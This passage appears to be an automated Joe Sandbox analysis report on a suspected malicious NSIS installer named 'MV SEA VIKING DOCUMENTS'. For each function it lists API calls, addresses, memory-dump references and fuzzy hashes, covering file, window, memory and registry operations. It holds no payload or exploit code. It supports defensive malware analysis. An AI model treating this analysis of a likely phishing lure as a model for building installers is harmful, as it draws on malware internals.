                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000,00000000,00425A20,76F723A0), ref: 004066A8
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll,00000000), ref: 00406779
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Directory$SystemWindowslstrcatlstrlen
                                                                                                                                                                                                                                • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsrCC4C.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                • API String ID: 4260037668-2768826128
                                                                                                                                                                                                                                • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404500 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                                                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 0040455B
                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                                                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 00404573
                                                                                                                                                                                                                                • GetSysColor.USER32(?), ref: 00404586
                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00404596
                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004045B0
                                                                                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                                                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                                                                                                                                                                                                  • Part of subcall function 0040610E: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406124
                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                                • String ID: 9
                                                                                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                                                                                • Opcode ID: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction ID: 36eba916602f65c1f8b814f2f26102ddc75cc08ed25eda7b441ea0696c55e726
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 05ec9e9945247294569ed32eb70c3e484d87f4f0290394ce4997a83a7f1e58dd
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C551E975D00219AADF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004067C4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                                                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                                                                                                                                                                                                • CharNextW.USER32(?,00000000,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                                                                                                                                                                                                • CharPrevW.USER32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                                                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 589700163-2977677972
                                                                                                                                                                                                                                • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00404E54 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                                                                                                                                                                                                • GetMessagePos.USER32 ref: 00404E77
                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404E91
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                • String ID: f
                                                                                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402F93 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                                                                                                                                                                                                • MulDiv.KERNEL32(000982BC,00000064,00099830), ref: 00402FDC
                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00402FEC
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402FFC
                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 0040300E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • verifying installer: %d%%, xrefs: 00402FE6
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                • Opcode ID: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction ID: eb17ebabde20c32bd565f0ca98bf5c3c7f8a04474e671541d9d17dad0456e96b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea3fb41b8b9d1af7e43715991a6ce4dd060937d78b5a266238e4f5c2501e20f6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20014B7064020DABEF209F60DE4AFEA3B79FB04345F008039FA06B51D0DBB999559F69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 71492655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 714912BB: GlobalAlloc.KERNELBASE(00000040,?,714912DB,?,7149137F,00000019,714911CA,-000000A0), ref: 714912C5
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 71492743
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 71492778
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1780285237-0
                                                                                                                                                                                                                                • Opcode ID: d0c245bcaaa8d97e10df4c6535d70c8c86e69d321b297f2ae10326b71298c91d
                                                                                                                                                                                                                                • Instruction ID: 8a9c14042efdc29769a988d43f8dbc4463fcb3665ea6f0a343e8d7a9a7a3de9b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d0c245bcaaa8d97e10df4c6535d70c8c86e69d321b297f2ae10326b71298c91d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B31E3B2108102DFD7279F65C9C4D2E7FB6FB9530472645ADF102B7210C7315809CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300899095.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300959081.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301007520.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301071541.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301416769.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2301518255.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2302104831.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2667972263-0
                                                                                                                                                                                                                                • Opcode ID: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction ID: 8fc1a79e9ee36ebd610a2d663d7387b5f1fea8f48d7bc9e01940cd119f3fb53c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18333e3c7c5edca9258600c879c391e4e8cb8a080c4e0dd56f257e0fabcb70bb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E0CB794C429BA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 71492480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 714925C2
                                                                                                                                                                                                                                  • Part of subcall function 714912CC: lstrcpynW.KERNEL32(00000000,?,7149137F,00000019,714911CA,-000000A0), ref: 714912DC
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040), ref: 71492548
                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 71492563
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2329312091.0000000071491000.00000020.00000001.01000000.00000005.sdmp, Offset: 71490000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329262917.0000000071490000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329365746.0000000071494000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2329401536.0000000071496000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_71490000_MV SEA VIKING DOCUMENTS.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4216380887-0
                                                                                                                                                                                                                                • Opcode ID: 02c703e46bb4d5839e3cc5474cc0937b94ba80f523ca51a9c53a0e3698f0fbc4
                                                                                                                                                                                                                                • Instruction ID: 75e49c14ba34f87078ed2258ca6ad0f489aa80aa0756ba1bff03cdfa3cab04af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02c703e46bb4d5839e3cc5474cc0937b94ba80f523ca51a9c53a0e3698f0fbc4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2141B1B1008306EFD725DF25D844E667FF8FB64320F11492EE447DA681E730A549CBA9
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.2300564925.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300544038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300622526.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.2300650124.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
